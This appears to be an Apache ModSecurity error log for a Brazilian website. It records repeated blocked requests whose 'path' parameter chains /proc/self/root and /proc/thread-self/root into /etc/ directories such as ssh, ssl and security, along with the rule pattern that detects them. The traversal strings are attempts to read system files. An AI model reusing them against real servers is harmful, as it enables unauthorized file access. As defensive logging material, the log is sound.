[Mon Mar 16 17:53:32.183453 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.241.46:37870] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhtzP9ocpUE4ed4uDwN9wAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:53:35.607804 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:60334] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhtz46lpbStxTqkSkuEKwAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:53:40.659008 2026] [:error] [pid 15061:tid 140411641214720] [client 74.7.241.46:60336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abht1KTCbgAP5jq5TehGLAAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:53:46.034998 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:55326] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abht2rysWC90G-1nBrBfoQAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:54:02.173438 2026] [:error] [pid 29802:tid 140411641214720] [client 74.7.241.46:36340] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abht6s_BxrYCr4hPDw8FoAAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:54:03.533770 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:34876] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abht67ysWC90G-1nBrBfowAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:54:24.242947 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.241.46:34890] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuAKTCbgAP5jq5TehGTgAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:54:25.582742 2026] [:error] [pid 15568:tid 140411699963648] [client 74.7.241.46:47034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuAaQpVkWug9HeOt9OwgAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:54:37.021489 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.241.46:47042] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuDaTCbgAP5jq5TehGXQAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:54:38.350027 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.241.46:33524] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuDtSswJuvopo3lOh6pgAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:54:49.373488 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.241.46:33534] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuGbysWC90G-1nBrBfsQAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:54:58.007570 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:42438] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuIrysWC90G-1nBrBfuQAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:54:58.342743 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.244.31:44482] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhuIv9ocpUE4ed4uDwOawAAAgE"]
[Mon Mar 16 17:55:01.449397 2026] [:error] [pid 29802:tid 140411641214720] [client 74.7.241.46:34518] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuJc_BxrYCr4hPDw8FrgAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:55:06.270937 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.241.46:34528] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuKo6lpbStxTqkSkuENQAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:55:13.465585 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.241.46:34530] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuMaQpVkWug9HeOt9OzAAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:55:25.028039 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.241.46:56668] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuPbABkC4fWIHEf8ERYwAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:55:26.433191 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:44966] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuPrABkC4fWIHEf8ERZQAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:55:27.595608 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.241.46:44980] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuP6TCbgAP5jq5TehGZwAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:55:29.696143 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:51830] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuQbABkC4fWIHEf8ERaQAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Mon Mar 16 17:55:30.047891 2026] [:error] [pid 29802:tid 140411741927168] [client 74.7.241.46:48760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuQs_BxrYCr4hPDw8FsgAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:55:44.598561 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.243.203:38100] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhuUKQpVkWug9HeOt9O4QAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
